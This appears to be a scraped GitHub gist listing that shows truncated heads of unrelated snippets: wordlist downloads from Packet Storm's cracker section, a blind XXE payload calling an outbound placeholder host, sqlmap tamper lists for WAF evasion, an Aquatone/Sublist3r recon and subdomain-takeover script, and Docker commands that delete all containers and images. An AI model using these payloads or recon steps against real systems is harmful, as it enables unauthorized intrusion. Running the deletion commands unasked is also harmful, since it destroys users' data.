Live coding demo from talk at Kod.io @ Linz 2014.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Script by OliverK | |
#Downloads _every_ wordlist in the packet storm security site. | |
#April 18th, 2011 | |
# Updated Oct , 2th, 2012 | |
mkdir common | |
cd common | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
DOMAIN="example.com" | |
EMAIL="contact@personalemail.com" | |
http -a 'api:key-00000000000000000000000000000000' \ | |
-f POST "https://api.mailgun.net/v3/$DOMAIN/messages" \ | |
from="Excited User <postmaster@$DOMAIN>" \ | |
to="$EMAIL" \ | |
subject="Hello" \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
if [ "$1" == "" ]; then | |
echo "Usage: $0 <file to uncompress>" | |
exit | |
fi | |
pigz -dc $1 | tar xf - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# kill current docker | |
docker kill $(docker ps -q) | |
# Delete all containers | |
docker rm $(docker ps -a -q) | |
# Delete all images | |
docker rmi $(docker images -q) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 2017-10-01T14:14:44+00:00 | |
108.175.32.0/20 | |
108.175.34.0/24 | |
108.175.35.0/24 | |
192.173.64.0/18 | |
198.38.100.0/24 | |
198.38.101.0/24 | |
198.38.108.0/24 | |
198.38.109.0/24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Script by OliverK | |
#Downloads _every_ wordlist in the packet storm security site. | |
#April 18th, 2011 | |
# Updated Oct , 2th, 2012 | |
mkdir common | |
cd common | |
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# All scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
``` | |
# General scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
``` | |
# Microsoft access | |
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "[*]Basic Aquatone Scan Started [*]" | |
aquatone-discover -d $1 --threads 10 | |
aquatone-scan -d $1 --ports huge --threads 10 | |
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10 | |
aquatone-takeover -d $1 --threads 10 | |
echo "[*]sublistr scan for subdomains[*]" | |
python /root/Sublist3r/sublist3r.py -v -b -d $1 -o $1-subdomains.txt | |
dos2unix $1-subdomains.txt | |
echo "Merging found subdomains" |
OlderNewer